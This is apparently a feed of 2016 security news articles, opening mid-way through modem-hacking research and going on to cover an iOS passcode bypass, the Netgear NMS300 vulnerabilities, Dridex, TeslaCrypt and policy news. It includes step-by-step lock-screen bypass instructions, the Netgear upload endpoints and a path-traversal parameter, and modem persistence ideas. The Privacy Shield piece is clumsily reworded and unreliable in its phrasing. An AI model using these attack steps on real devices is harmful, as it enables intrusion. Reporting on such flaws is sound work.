Vulnerable client software. One of the operators delivered vulnerable diagnostic software together with its modems, which allowed executing an arbitrary code on Windows and OS X PCs. Reference: we'd like to give a special thanks to Mikhail Firstov from Headlight Security for detecting this vulnerability.
Random Code Execution in the client software of a modem
6. APT Attacks
After infecting the modem and host, you need to stay in the systems somehow — save changes in the modem's even after it is switched off and prevent further firmware updates. It would be useful to detect and infect other vulnerable modems as soon as they will be connected to the PC. Most of the devices can be infected right at the phone store during "checking before buying".
There was another attack we failed to conduct — accessing the modem from the operator's network. Most vulnerable web servers listen at *:80, i.e. there's a chance that the modem's web server will be available from the operator's network. Only a few modems restrict connections incoming from the telecom's network or specify the address for listen 192.168.0.1:80.
7. Additional Information
We also studied getting access to a personal account by sending a USSD request and resetting password via an SMS message.
This vector was demonstrated during the "#root via SMS" presentation. The vulnerability was exploited through an XSS attack that could be conducted by sending an SMS message. However, an attacker can also do that in modems that allow SMS reading via RCE.
XSS exploitation results
Summary
All in all, we have a full infection cycle of devices and related PCs. Using the infected devices, we can determine location, intercept and send SMS messages and USSD requests, read HTTP and HTTPS traffic (by replacing SSL certificates), attack SIM cards via binary SMS messages, and intercept 2G traffic. Further infection can continue through the operator's networks, popular websites or equipment infected by worms (when connecting a new device).
What can we recommend to those clients who constantly work with such devices? Huawei modems with the latest firmware updates are the most protected. It is the only company that delivers firmware (the operators are only allowed to add some visual elements and enable/disable certain functions) and fixes vulnerabilities detected in its software.
Modems
Information Disclosure
Although 90 days had left since the service providers were informed of the vulnerabilities, many flaws remained unfixed. A crucial point: the vulnerabilities found during the research are not always fault of modem vendors. They can be added by telecom operators during software customization.
How to thwart the passcode lock screen on iOS 8 and 9?
8.2.2016 Apple
A security expert discovered an authentication bypass vulnerability in both iOS devices that allows thwarting lock screen passcode.
The security researcher Benjamin Kunz Mejri from Vulnerability Laboratory has discovered an authentication bypass-sized hole in both iPhones and iPads running iOS 8 and iOS 9 that can be exploited by attackers to thwart lock screen passcode.
This threat is real people, there is a video of it and documentation available online. It’s all pretty technical but the upshot is the vulnerability lets an attacker bypass the lockscreen on handsets running iOS 8 and iOS 9.
It is important to highlight that the attacker requires physical access to an unlocked iOS device, for this reason the threat is considered not so critical.
“An application update loop that results in a pass code bypass vulnerability has been discovered in the official Apple iOS (iPhone5&6|iPad2) v8.x, v9.0, v9.1 & v9.2. The security vulnerability allows local attackers to bypass pass code lock protection of the apple iphone via an application update loop issue. The issue affects the device security when processing to request a local update by an installed mobile ios web-application.” states the technical description published by the vulnerability-lab.com.
The attacker can bring the iOS devices into an unlimited loop resulting in a temporarily deactivate of the pass code lock screen.
“Local attacker can trick the iOS device into a mode were a runtime issue with unlimited loop occurs. This finally results in a temporarily deactivate of the pass code lock screen. By loading the loop with remote app interaction we was able to stable bypass the auth of an iphone after the reactivation via shutdown button. The settings of the device was permanently requesting the pass code lock on interaction. Normally the pass code lock is being activated during the shutdown button interaction. In case of the loop the request shuts the display down but does not activate the pass code lock like demonstrated in the attached poc security video.”
The issue could be triggered by powering off the iOS device, upon reboot the passcode authentication feature remains disabled, allowing an attacker to access the device without providing the passcode.
iPhone 6 bypass passcode
The advisory describes the following attack scenario:
First fill up about some % of the free memory in the iOS device with random data.
Now, you open the app-store choose to update all applications (update all push button).
Switch fast via home button to the slide index and perform iOS update at the same time Note: The interaction to switch needs to be performed very fast to successfully exploit. In the first load of the update you can still use the home button. Press it go back to index.
Now, press the home button again to review the open runnings slides.
Switch to the left menu after the last slide which is new and perform to open siri in the same moment. Now the slide hangs and runs all time in a loop.
Turn of via power button the ipad or iphone ….
Reactivate via power button and like you can see the session still runs in the loop and can be requested without any pass code Note: Normally the pass code becomes available after the power off button interaction to stand-by mode.
Successful reproduce of the local security vulnerability!
Kunz reported the vulnerability to the Apple Product Security Team in late 2015, but at the time I was writing the issue is still present.
Are you an iOS user? You should be careful when leaving the mobile device unattended.
Dyre crackdown, the biggest effort to date by Russian authorities against cybercrime
8.2.2016 Crime
Russian authorities raided offices of a Russian film distribution and production company as part of an operation against the Dyre gang.
Russian law enforcement and intelligence agencies in November raided offices of a Russian film distribution and production company as part of an operation against one of the world’s most notorious cybercrime ring.
The authorities were supported by the experts at Kaspersky Lab who confirmed the involvement and announced it would reveal details about the operation at its annual conference.
This is the biggest effort to date of Russian authorities against the cybercrime.
Experts believe that the ring is responsible for the distribution of the infamous Dyre banking trojan that caused overall losses for more than tens of millions of dollars.
The list of victims includes names like Bank of America Corp and JPMorgan Chase & Co.
According to the Reuters that published the news in exclusive, authorities haven’t commented the operations, meanwhile the CEO of the film company refused to provide further information.
“A spokesman for the Russian Interior Ministry’s cybercrime unit said his department was not involved in the case. The FSB, Russia’s main intelligence service, said it had no immediate comment.
Nikolay Volchkov, the chief executive of the film company named 25th Floor, said he could not answer questions about the raid.” wrote the Reuters.
Reuters clarified that it has no evidence that Volchkov or the film company is directly involved the criminal organization.
The unique certainly is that rarely criminal rings operating in from Russian are persecuted by the government if they don’t target Russian organizations.
According to the Heimdal Security, in November 2015 more than 80.000 machines were already infected with Dyre Trojan across the world. The experts at Dell SecureWorks estimated that more than 400 financial institutions have fallen victim of the infamous trojan.
Dyre is usually downloaded by the malicious trojan Upatre, it is a powerful malware capable to perform man-in-the-middle attacks through browser injections and harvest the victim’s credential.
The experts believe that the operation of the Russian authorities has successfully beheaded the organization behind the Dyre Trojan.
“We have seen a disruption over the last few months that is definitely consistent with successful law enforcement action,” explained security expert John Miller from iSight Partners.
There is another mystery in the story, the film company was working on a production called Botnet. a film on cybercrime ring with a story that has many similarities with the Dyre gang.
The company also hired the firm Group-IB to advise the Botnet director and writers on the finer points of cybercrime.
Group-IB CEO, Ilya Sachkov, said he met Volchkov at a security conference.
“He asked if we would be interested in consulting with a scriptwriter they would hire in the United States,” Sachkov said.
In November, Sachkov received a strange and an urgent call from Volchkov, saying he needed to meet.
“He was afraid. His colour was totally white,” said Sachkov. “He knows there is an ongoing investigation about cybercrime.”
Reuse of login credentials put more than 20M Alibaba accounts at risk
8.2.2016 Hacking
The reuse of login credentials on Taobao exposed more than 20 million accounts on Alibaba’s websites to attacks.
According to the state media reports, hackers have targeted over 20 million active accounts on Alibaba Group’s Taobao e-commerce website using Alibaba’s own cloud computing service.
The Chinese Giant detected the attack in “the first instance” and responded requesting users to change their passwords.
According to a report published on a website managed by the Ministry of Public Security, hackers behind the attack obtained a database of 99 million usernames and passwords from a number of websites.
The hackers used the Alibaba’s cloud computing platform in the attempt to use the stolen credentials with the Taobao platform.
The hackers discovered that 20.59 million of the 99 million usernames, were shared among different websites, including the e-commerce platform of the Chinese Giant.
20.59 million represents about five percent of annual active buyers on Chinese retail marketplaces.
Alibaba Taobao 2
‘A spokesman from Alibaba confirmed that hackers rented the cloud computing service to launch the attack, but highlighted that there are no security issues affecting the company’s platform.
“Alibaba’s system was never breached,” the spokesman declared.
The hackers started to test the stolen credentials in mid-October and were discovered in November, when experts at Chinese company discovered the unauthorized accesses reported the case to police.
According to the ministry website, Alibaba discovered and blocked the majority of login attempts.
The experts discovered that the compromised accounts were used in various fraudulent activities. The hackers used them to raise Taobao sellers’ rankings placing fake orders, a mechanism known as ‘brushing’.
The incident once again raises the importance of a proper security posture for Internet users, the bad habit of sharing same login credentials among several web services is one of the main causes of security breaches.
Maru OS — Android ROM that Turns into Debian Linux When Connected to a PC
6.2.2016 OS
Good News for Linux Techno Freaks! Do you usually mess with your Android smartphone by trying out the continual ins and outs of various apps and custom ROMs?
Then this news would be a perfect pick for you!
What If, you can effectively carry a Linux computer in your pocket?
Hereby introducing a new Android-based Operating system named "Maru OS" that combine the mobility of a smartphone as well as the power of a desktop on a single device.
Maru OS allows you to turn your smartphone into a desktop when plugging it with an HDMI cable.
Maru custom ROM includes two operating systems:
Android 5.1 Lollipop for mobile phones
Debian-Linux for desktop monitor
When you connect your phone (with Maru OS installed on it) via HDMI to a monitor, it will load Debian Linux automatically on your desktop screen in less than 5 seconds.
"Your phone runs independently of your desktop so you can take a call and work on your big screen at the same time," Maru OS official website explains.
Maru is shipped with Zero Bloatware (no pre-installed apps), which facilitates lots of free space for all your apps and your phone runs fast.
maru-android-os
Advantages of Maru OS
Dual OS in phone
Multi-Tasking
Lightweight Distro Packages
Zero Bloatware, except Google Play
Run a web server from your pocket
You can set up a portable development environment
And the Best One:
If by chance… your phone get disconnected from your screen, Maru OS will preserve your desktop state in the background, helping you pick up right where you left off.
"Your hardware's capabilities are shared across your mobile device and desktop, so you don't have to context-switch around so much," reads the website.
This latest OS is still in beta stage and currently available only in Nexus 5 devices. We hope this limitation might disappear later on.
MIT Develops Hack-Proof RFID Chip — Here's How It Works
6.2.2016 Hacking
MIT Develops Hack-Proof RFID Chip
Do you know about RFID chips and how many you are carrying at this moment?
Today, RFID chips are built-in all sorts of items, including your credit cards, travel swipe cards, library books, grocery store cards, security tags, implanted medical records, passports and even the access cards provided by companies.
But, What actually is an RFID chip?
Radio frequency identification (RFID) is a small electronic device consisting of a chip on which data can be encoded, and an antenna used to transmit that data. It is typically used for short-distance communication of information.
However, there is concern that these RFID chips could easily be hacked, and the information on these chips could easily be stolen by hackers. After all, they don't even require physical access to these chips in order to get data from it.
The good news is:
Researchers at MIT have developed a new way that prevents RFID chips from hacking.
Although the information on RFID chip is protected with a secret cryptographic key that could thwart a casual data thief, skilled RFID hackers have repeatedly used "Side Channel Attacks" to steal information from these chips easily.
Side Channel Attacks:
The 'side-channel attacks' are designed to extract the secret cryptographic key from a system by analyzing the pattern of memory utilization or fluctuations in power usage.
Also Read: This $10 Device Can Clone RFID-equipped Access Cards Easily
However, side-channel attacks only leak a little amount of information for each repetition of a cryptographic algorithm, so a hacker need to run the attack many numbers of times to get a complete secret key.
Power Glitch Attacks:
One way to prevent side channel attacks is to rotate the private key frequently after each transaction with the help of a random-number generator, but a skilled hacker can overcome this with a so-called "Power Glitch Attack."
Repeatedly cutting the RFID chip's power just before it changes the secret cryptographic key is known as power glitch attack.
By using this method, hackers can render the above strategy ineffective and run the same side-channel attack thousands of times, with the same key, in order to get the pattern and fetch the information from the RFID chip.
Here's How MIT Hack-Proof RFID Chip Works:
The new RFID chip developed by MIT researchers and manufactured by Texas Instruments is designed to block power glitch attacks, which is virtually impossible to hack by any current means, researchers claimed.
The new hack-proof RFID chip can resist power-glitch attacks by having:
An on-board power supply that is "virtually impossible to cut."
Non-volatile memory cells that store computations the chip is working on, even if there's a power cut.
This results in resuming of computation once the power gets restored.
"If that computation was an update of the secret key, it would complete the update before responding to a query from the scanner," the researchers wrote in a press release. "Power-glitch attacks won't work."
To achieve this, the new chip takes advantage of a material called Ferroelectric crystals that consist of molecules arranged into a lattice form where positive and negative charges naturally separate.
Also Read: Hacker Implants NFC Chip In His Hand To Hack Android Phones
These ferroelectric crystals can operate as a capacitor for storing power, producing computer memory that retains data even when powered off.
The research team claims that if this high-security RFID chip hits mainstream adoption, it could help prevent contactless card details from being stolen, potentially preventing credit card frauds.
However, nothing is unhackable today, so calling something "hack-proof" or "virtually impossible to hack" doesn't make sense. As hackers nowadays are so skilled that even devices that are designed on the top of security features aren't immune to hacks.
However, new technologies, like this RFID chip, that take the security of users to the next level are always a good idea and importantly required to secure the world.
Researchers spotted a new OS X scareware campaign
6.2.2016 Apple
Experts at the SANS Technology Institute spotted an OS X scareware campaign that leverages fake Adobe Flash Player installers.
Johannes Ullrich, security expert at the SANS Technology Institute, spotted an OS X scareware campaign that leverages fake Adobe Flash Player installers to trick users into downloading malicious software. The expert discovered the malicious campaign while analyzing Facebook clickbait scams.
“They do not rely on a vulnerability in the operating system. Instead, the user is asked to willingly install them, by making them look like genuine Adobe Flash warnings (and we keep telling users to make sure Flash is up to date, so they are likely going to obey the warning and install the update).” states the blog post published by the SANS Technology Institute. “The “Installer” for the fake Flash update will install various scare ware (I observed a couple different varieties when re-running the installer), and it actually installs an up to date genuine version of Flash as well.”
The attackers used a simple and effective trick to deceive victims, the attack starts with a popup window alerting users that their Flash Player software is outdated and providing them the instruction to update it.
Ullrich suspects that the code used to display the popup is injected by an advertisement on the page visited by the victim. If users accept to install the bogus update they will receive a fake Flash Player installer.
The bogus installer is able to bypass the Apple’s Gatekeeper security feature, it appears as a legitimate application and is signed with a valid Apple developer certificate issued to one Maksim Noskov.
“Antivirus coverage was pretty bad yesterday when I came across this (4 out of 51 on Virustotal). On a brand new OS X 10.11 install, the “Installer” appears to install a genuine copy of Adobe Flash in addition to Scareware that asks for money after informing you of various system problems.” continues the post.
The software installs a genuine Flash Player software and attempts to convince users to download applications apparently designed to fix problems on the victim’s machine.
These applications attempt to trick users into calling a “support” line in order to receive instructions for fixing the alleged problems. The security experts published a small video showing what happens when victims install the “update” on a clean OS X 10.11 system:
Critical Flaws Found in NETGEAR Network Management System
5.2.2016 Vulnerebility
Netgear, one of the most popular router manufacturers, has been vulnerable to two different flaws that could allow hackers to compromise your corporate network and connected devices.
Reported critical vulnerabilities reside in the Netgear's ProSafe NMS300 Model (Network Management System) – a centralized and comprehensive management application for network administrators that enables them to discover, monitor, configure, and report on SNMP-based enterprise-class network devices.
SNMP (Simple Network Management Protocol) is a network management protocol which facilitates Netgear's ProSafe NMS300 application to gather data from various network devices such as servers, printers, hubs, switches, and routers.
Remotely collected data includes CPU load, routing tables, and network traffic statistics.
Serious Flaws in Network Management System
Netgear-ProSafe-NMS300-network-managment-system
A joint security dug conducted by Pedro Ribeiro (Security Researcher of UK Based firm Agile Information) along with CERT Committee divulged the vulnerabilities in the web interface of the router that could allow attackers to:
Upload and Execute any malicious file remotely (CVE-2016-1524)
Download any file from Server (CVE-2016-1525)
Unauthorized Arbitrary File Upload Flaw: This flaw comes with the default installation of NMS300, allowing an unauthorized attacker to upload an arbitrary file and execute (Remote Code Execution) malicious code with SYSTEM privileges.
Upload location: http://:8080/fileUpload.do
Upload location: http://:8080/lib-1.0/external/flash/fileUpload.do
Execurition Location: http://:8080/null
Directory Traversal Attack: This vulnerability allows authenticated users to read and download any restricted file by manipulating ‘realName’ parameter of POST request to http://:8080/data/config/image.do?method=add URL.
The security vulnerabilities affect Netgear Management System NMS300, version 1.5.0.11 and earlier.
How to Protect Your Network from Hackers
Since there are no patches yet available from Netgear to fix these vulnerabilities, the only solution that network admins could implement here is strengthening the firewall policy by restricting the untrusted sources.
As threats continue to evolve and increase in volume and frequency, you can no longer rely on static network security monitoring.
Network administrators highly recommended to monitor network-based services or protocols on a continuous basis using any Security monitoring solutions, like (USM), which also includes (IDS) and to help administrators to identify quickly and remediate threats your network.
Netgear had not yet commented to this issue.
United Nations Rules in Favor of WikiLeaks Founder Julian Assange
5.2.2016 BigBrothers
VICTORY!
As a result of the legal action against WikiLeaks founder Julian Assange by both British and Swedish Governments, he has been arbitrarily detained by the United Kingdom and Sweden since his arrest in London over five years ago.
However, Assange filed a complaint against both the governments in September 2014 that has been considered by the United Nations Working Group on Arbitrary Detention.
Last week, Assange gave a statement that if the ruling comes against him, then he will surrender himself to Britain.
But, Victory! The decision is in favor of Assange.
The UN group has ruled that the UK and Swedish authorities had illegally detained Assange in violation of their international human rights obligations.
Julian Assange should be released immediately and allowed to leave the embassy as well as both the UK and Sweden should compensate him for his "deprivation of liberty", the UN Working Group on Arbitrary Detention said in a statement released today.
"Having concluded that there was a continuous deprivation of liberty, the Working Group also found that the detention was arbitrary because he was held in isolation during the first stage of detention and because of the lack of diligence by the Swedish Prosecutor in its investigations, which resulted in the lengthy detention of Mr. Assange," reads the UN report.
But, Will UK and Sweden Let Assange Leave the country?
Despite the decision is in favor of Assange, there could be a possibility that both the countries’ governments will not let Assange leave the country.
The UN group's ruling is not legally binding in the United Kingdom, so the European Arrest Warrant against Assange remains in place, which means the British government continues to have a legal obligation to extradite Assange.
The UK Foreign Office Secretary Philip Hammond said the UN panel's decision was "ridiculous", and Assange was a "fugitive from justice."
Hammond said the report "changes nothing" and Assange can come out "anytime he chooses" but he will still have to face justice in Sweden.
To make this sure, the Met Police, meanwhile, said it will make "every effort" to arrest Assange should he leave the embassy.
Assange has been living in the Ecuadorian embassy in London for over 3 years, after losing a series of appeals in British courts, to avoid extradition to:
Sweden where he is facing sexual assault allegations, which he has always denied.
The United States where he could face cyber espionage charges for publishing classified US military and diplomatic documents via his website Wikileaks.
Assange's Lawyer: Sweden and UK should Respect UN’s Decision
Melinda Taylor, Assange's lawyer, says that if there is a positive ruling for Assange by UN group, Swedish and British government should respect their international obligations and comply with the decision, thereby allowing him to leave freely.
"If WGAD issues a positive determination, Mr. Assange expects the United Kingdom and Sweden to ensure that he can immediately exercise his right to personal liberty, in a manner which is consistent with his right to safety and protection from retaliatory acts associated with his groundbreaking work at WikiLeaks in exposing government violations and abuses," Taylor told Newsweek reporter.
If this is the case, Taylor expects Assange to seek safe passage to Ecuador upon leaving the country's London embassy.
Established in 1991, the UN's Working Group on Arbitrary Detention is made up of 5 legal experts from around the world and has made hundreds of rulings, helping governments to release people.
Similar rulings from the UN panel have resulted in the release of:
Washington Post journalist Jason Rezaian, who was released in Iran last month.
Former pro-democracy President Mohamed Nasheed freed in the Maldives last year.
Burmese stateswoman Aung San Suu Kyi from house arrest in 2010.
Assange was initially arrested in London on 7 December 2010 under a European Arrest Warrant issued by Sweden over rape and sexual molestation charges, however, while on bail in 2012, he claimed asylum in the Ecuadorean embassy in Knightsbridge, where he is currently residing.
Australian NSW Government Department of Resources and Energy under attack. Is it Chinese cyber espionage?
5.2.2016 Safety
According to the NSW Government Department of Resources and Energy Chinese hackers have launched a malware-based attack on its network in December.
The Australian NSW Government Department of Resources and Energy revealed that in December 2015 unknown hackers targeted its systems. In the same period, the organization was launching a number of important projects, including a project of the Shenhua Watermark coal mine.
The project for the Shenhua Watermark coal mine has been estimated in $1.2 billion and indirectly involves the Chinese government, a circumstance that lead the experts in believing that Chinese-nation state hackers may have launched the attack for intelligence purpose.
“In December 2015, NSW Department of Industry IT security systems detected a marked increase in virus/security activity attempting to impact systems at the Division of Resources and Energy (DRE) office in Maitland. The attacks were identified by specialist software we have in place to detect breaches to our firewalls. Given the increased levels of activity we took further steps to ensure that our systems were protected. We do not believe that the attacks penetrated our systems or any data was accessed at this time.
The attack was in the form of an increase in “virus/security activity attempting to impact systems at the Division of Resources and Energy (DRE) office in Maitland”, states the NSW Government Department of Resources and Energy in an official announcement. and steps were taken to increase security after the activity was detected.
The hackers coordinated a malware-based attack to hack into the Department’s network, the organizations already announced that steps were taken to increase security in response to the offensive.
NSW Government Department of Resources and Energy Chinese HACKERS
It is not clear if the hackers successfully breached the network at the NSW Government Department of Resources and Energy, the New South Wales Opposition is calling for further investigation despite the officers believe that no data has been exfiltrated by the hackers.
“These reports are highly disturbing. I have sought a briefing from the minister and his agency as soon as possible. The Opposition will be seeking an assurance from the Baird Government that the integrity of the commercially sensitive data held by the Department of Industry has not been compromised.” declared the Australian politician Adam Searle to the ABC’s The World Today.
The experts speculate the involvement of Chinese hackers, the government of Bejing is considered responsible for a large number of cyber espionage operation worldwide.
“Well you don’t always know if you’ve been compromised in terms of cyber attack, so I think perhaps a more accurate way to put it would be to say they don’t think they’ve been compromised on this occasion. But if it’s like many other areas of government, they will be under constant attack, there will be sort of daily probes, hourly probes on the part of malicious cyber actors looking for vulnerabilities. ” added Peter Jennings, the executive director of the Australia Strategic Policy Institute.
“I think it is possible because we know China has one of the most aggressive cyber intelligence gathering policies around the world and that they are constantly looking to gather information, intellectual property, from the private sector as well as national security information from government departments.” “And in the case of Australia, obviously China has a deep interest in our approach to natural resources.”
In December, Chinese hackers have conducted another major attack on a supercomputer operated by Australia’s Bureau of Meteorology (BoM). The news was disclosed by the Australian Broadcasting Corporation (ABC). The Bureau of Meteorology is Australia’s national weather, climate and water agency, it is the analog of the USA’s National Weather Service.
“China is being blamed for a major cyber attack on the computers at the Bureau of Meteorology, which has compromised sensitive systems across the Federal Government.” states the ABC. “The bureau owns one of Australia’s largest supercomputers and provides critical information to a host of agencies. Its systems straddle the nation, including one link into the Department of Defence at Russell Offices in Canberra.”
The systems at the Bureau of Meteorology elaborate a huge quantity of information and weather data that are provided to various industries, including the military one.
Emergency. Hundreds of compromised WordPress sites serve TeslaCrypt ransomware
5.2.2016 Virus
Operators running websites based on the WordPress must be aware of a spike in the number of compromised platforms used to deliver the TeslaCrypt ransomware.
Administrators running websites based on the popular WordPress CMS must be aware of a spike in hacks that are resulting in the silent delivery of ransomware to the visitors.
According to the experts at the Heimdal Security, threat actors hacked WordPress-based sites to redirect victims to other domains hosting the Nuclear Exploit Kit.
People who visit the compromised WordPress sites using out-of-date versions of popular software, including Flash Player, Adobe Reader and Internet Explorer, can be infected with the Teslacrypt ransomware. The experts at Heimdal discovered that the attackers behind the current WordPress compromises were exploiting an unidentified vulnerability with obfuscated JavaScript. The code redirects victim to the domain chrenovuihren that serves an online ad that forces traffic to the site hosting Nuclear.
“Our team warns that a disproportionate amount of websites that employ the WordPress platform have been compromised by cyber criminals. Hundreds of WordPress websites spreading malware. The attackers fed obfuscated Javascript code to these websites. The users who end up on the hacked websites are redirected on a domain called “chrenovuihren” via multiple servers.” states a blog post published by Heimdal Security.
It isn’t the first time that the Nuclear Exploit Kit is used to drop ransomware, in November it Kit has been used for the first time to serve the ransomware CryptoWall 4.0, meanwhile in the past criminal groups used it to serve instances of the CryptoWall 3.0.
The Heimdal Security researchers identified three IP addresses of Nuclear EK gateways:
159,203.24 [.] 40
164,132.80 [.] 71
162,243.77 [.] 214
The campaign relies on a number of domains to spread the malware, the domains are all subdomains of the chrenovuihren.
“The campaign makes use of several domains to deliver the malicious code, which is why active servers can quickly change depending on which IP as DNS lookup they use,” continues the post.
“We have already blocked more than 85 domains that are being actively used in this campaign, and the list will most likely increase.”
The bad news it the low detection rate for this threat, just 2 of 66 antivirus solutions on VirusTotal are able to detect the malicious agent.
This last campaign based on compromised WordPress-based websites comes a few days later another massive hacking campaign has been identified by experts at Sucuri, the researchers at Heimdal speculate the involvement of the same threat actors for both campaigns.
Website owners based on WordPress must protect their servers and let me share with you, once again, the following key recommendations to get protected against ransomware:
Keep software and your operating system updated at all times
Backup your data, do it often and in multiple locations
Use a security tool that can filter your web traffic and protect you against ransomware, which traditional antivirus cannot detect or block.
Someone Hijacks Botnet Network & Replaces Malware with an Antivirus
5.2.2016 Virus
The Dridex banking trojan that is widely being used by cyber criminals to distribute malware onto users’ machines has now been found distributing a security software.
A portion of the Dridex banking Trojan botnet may have been hacked or compromised by an unknown Whitehat Hacker, who replaced the malicious links with Avira Antivirus installers.
What is Dridex Banking Trojan? How it Works?
Dridex malware – also known as Bugat and Cridex – is believed to have been created by cyber criminals in Eastern Europe in an effort to harvest online banking details. Even after a high-profile takedown operation in late 2015, the Dridex botnet seems to be active again.
The Dridex virus typically distributes itself through spam messages or emails that include malicious attachments, most often a Microsoft Office file or Word document integrated with malicious macros.
Once the malicious file has been clicked, the macros download and install the main payload of the virus – the trojan program itself – from a hijacked server, which installs and runs on the victim's computer.
The Dridex trojan program then creates a keylogger on the infected machine and manipulates banking websites with the help of transparent redirects and web-injects.
This results in stealing victim's personal data like usernames and passwords, with an ultimate aim to break into bank accounts and siphon off cash.
Hacker replaces Trojan with Anti-virus
However, the recent Hack Surprises: Instead of distributing banking trojan, a portion of the Dridex botnet currently seems to be spreading legitimate copies of the free anti-virus software from Avira, as the company has announced itself.
"The content behind the malware download [link] has been replaced, it is now providing [a legitimate], up-to-date Avira web installer instead of the usual Dridex loader," explained Avira malware expert Moritz Kroll, reported Reg.
Avira believes that the white hat hacker or hackers may have hacked into a portion of infected web servers using the same flaws the malware authors used and then replaced the malicious code with the Avira installer.
So, once infected, instead of receiving Dridex malware, the victims get a valid, signed copy of Avira antivirus software.
"We still don't know exactly who is doing this with our installer and why – but we have some theories," said Kroll. "This is certainly not something we are doing ourselves."
Although the motives behind including the Avira software is still unclear, these kinds of actions are considered to be illegal in many countries, said Kroll.
What can be done to protect From Malware Attacks?
The guidance for preventing yourself from being a part of the Dridex Banking Trojan botnet is:
Ensure you have an updated antivirus program running on your PC, which should be able to intercept the malicious attachments before they are opened.
One of the best measures for securing your online environment is to deploy an at the network layer, which is especially useful to quickly detect malware and other threats in your network when integrated with a and SIEM (Security Intelligence and Event Monitoring) solution, such as (USM).
Be careful of opening email attachments sent from an unknown email address, particularly (in this case) Microsoft Word and Excel files.
Disable Macros in MS Office, or at least set the Macros to request permission before they run.
Someone has pwned the Dridex botnet serving the Avira Antivirus
5.2.2016 BotNet
Unknowns have pwned the Dridex botnet and are using it to spread a legitimate copy of the Avira Antivirus software instead the malicious payload.
This story is very intriguing, someone has hacked a portion of the dreaded Dridex botnet and replaced malicious links with references to installers for the Avira Antivirus. The Antivirus company denies any involvement and speculate the involvement of an unknown white hat hacker.
Spam campaigns relying on the Dridex malware are threatening banking users across the world despite the operations conducted by law enforcement on a global scale. We left Dridex malware spreading across the Europe, in particular targeting the customers of the banks in the UK. In October, the NCA has uncovered a series of cyber attacks based on a new strain of the Dridex banking trojan that allowed crooks to steal £20m in the UK alone.
Now Dridex is once again in the headlines, spam emails containing the famous malware are continuing to target netizens despite the arrest of one of its botmasters in August.
In October the experts at Palo Alto Networks confirmed that the overall volume of Dridex emails peaked nearly 100,000 per day, the campaign rapidly reached 20,000 emails, mostly targeting emails accounts in the UK.
Spam messages often include malicious Word documents embedded with macros, when victims open the macros download the Dridex payload from a hijacked server. Dridex is a banking trojan that relies on web injection to manipulate banking websites and use a keylogger component to monitor victim’s activity.
Now someone has pwned the Dridex botnet and is using it to spread a legitimate Antivitus software instead the malicious payload. Despite the noble intent, even the action of this unknown is illegal because he is spreading an installer on the victims’machine without their consensus.
“The content behind the malware download URL has been replaced, it’s now providing an original, up-to-date Avira web installer instead of the usual Dridex loader,” explained Moritz Kroll, a malware researcher at Avira.
“We still don’t know exactly who is doing this with our installer and why – but we have some theories,” said Kroll. “This is certainly not something we are doing ourselves.”
“A whitehat may have hacked into infected web servers using the same vulnerabilities the malware authors used in the first place and has replaced the bad stuff with the Avira installer,” added Kroll.
Avira was involved in a similar case in the past when the installer has been included into the CryptoLocker and Tesla ransomware.
Do you have a Netgear ProSAFE NMS300? Here you are the exploit to hack it
5.2.2016 Vulnerebility
A security researcher has released the exploit code for two serious vulnerabilities in the Netgear ProSAFE NMS300 network management system.
Do you have a Netgear ProSAFE NMS300 Management System? Now you have a reason to worry because the security researcher Pedro Ribeiro has discovered two serious vulnerabilities in the network device.
The Netgear ProSAFE NMS300 Management System allows administrators to monitor and manage their networks by using a user friendly web-based interface.
The device is affected by a vulnerability (Unrestricted Upload of File with Dangerous Type), coded CVE-2016-1524, that could be exploited by a remote, unauthenticated attacker to upload an arbitrary file to the system.
Once uploaded a file, it will be available in the server’s root directory at the following URL:
http://<IP>:8080/null<filename>
and it could be executed with SYSTEM privileges.
The remote code execution vulnerability received a CVSS score of 8.3, it can be exploited by sending a specially crafted POST request to one of two Java servlets present in default NMS300 installations.
“By sending a specially crafted POST request to the servlets, an attacker can upload arbitrary files that will then be accessible from the NMS300 server’s root directory as http://<IP>:8080/null<filename>. The NMS300 server runs with SYSTEM privileges.” states the advisory issued CERT Coordination Center at Carnegie Mellon University .
The second flaw (Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) ), coded CVE-2016-1525, discovered in the Netgear ProSAFE NMS300 is a directory traversal that could be exploited by an authenticated attacker to download any file from the device.
“An authenticated attacker can manipulate the realName parameter of a crafted POST request sent to http://<IP>:8080/data/config/image.do?method=add to load an arbitrary local file from the server host to a predictable location in the web service. The file can then be downloaded from http://<IP>:8080/data/config/image.do?method=export&imageId=<ID>, where <ID> is a count that increments by one every time a file is uploaded in this manner.” continues the advisory.
The security experts Ribeiro reported the flaws to Netgear via CERT/CC in December, but the issues are still present in the systems.
Riberio also published a proof-of-concept-code for the exploitation of the flaws, they are two Metasploit modules available for the download.
Waiting for a fix, let me suggest you to isolate the web management interface of your device from the Internet.
Safe Harbor replaced with Privacy Shield
4.2.2016 Security
The alleged Privacy Shield deal swaps the Safe Harbor arrangement that remained for over fifteen years before being smash down by a court in October
United States and European administrators have pounded out a very late arrangement to permit data streams across the Atlantic to proceed without violating the law.
“Surprisingly, the US has given the EU compulsory assurances that the access of public establishments for national safety purposes will be liable to clear protections, limitations and oversight devices,” said Europe’s justice Chief Věra Jourová.
“Additionally, EU nationals will profit by redress mechanisms around there. In the setting of the arrangements for this contract, the United States has guaranteed that it doesn’t lead mass or aimless surveillance of Europeans. We have built up a yearly joint survey with a specific end goal to closely monitor the execution of these assurances.”
Under the terms of the new arrangement, which has yet to be approved by EU individuals, the United States will give a yearly written commitment that it won’t enjoy mass surveillance of EU residents, and this will be reviewed by both sides once per year. .
United States organizations wanting to import EU nationals’ information must give “strong requirements on how private data is handled,” and implement same principles as European data protection laws. In the event that EU natives need to protest how their data is being utilized, organizations must react within time and at no cost to the pursuer.
Chief Jourova and her associate Andrus Ansip, vice president for the Digital Single Market on the European Commission, will now make draft on “adequacy decision” comprising the new standards for states member to approve. The United States will likewise keep on getting its administrative structure altered to lodge the new agreement.
“Our public can make sure that their data is completely secured. Our organizations, particularly the small ones, have the legal guarantee they have to build up their actions across the Atlantic,” said Ansip.
“We have an obligation to check and we will thoroughly monitor the new procedure to ensure it keeps delivering. Today’s choice helps us construct a Digital Single Market in the EU, a dynamic and trusted online environment; additionally it reinforces our close partnership with the United State.
Three months of desperate rewriting
The alleged Privacy Shield deal swaps the Safe Harbor arrangement that remained for over fifteen years before being smash down by a court in October. It’s the aftereffect of 3 months of desperate and sometimes tense consultations between the two trade giants, with tech companies in both regions pushing hard for an arrangement.
The DPAs will now dedicate the following couple of days pounding out the points of interest. There might at present be some individual staying focuses, yet the requirement for activity is moving Europe’s typically massive controllers more rapidly than expected, because of industry pressure.
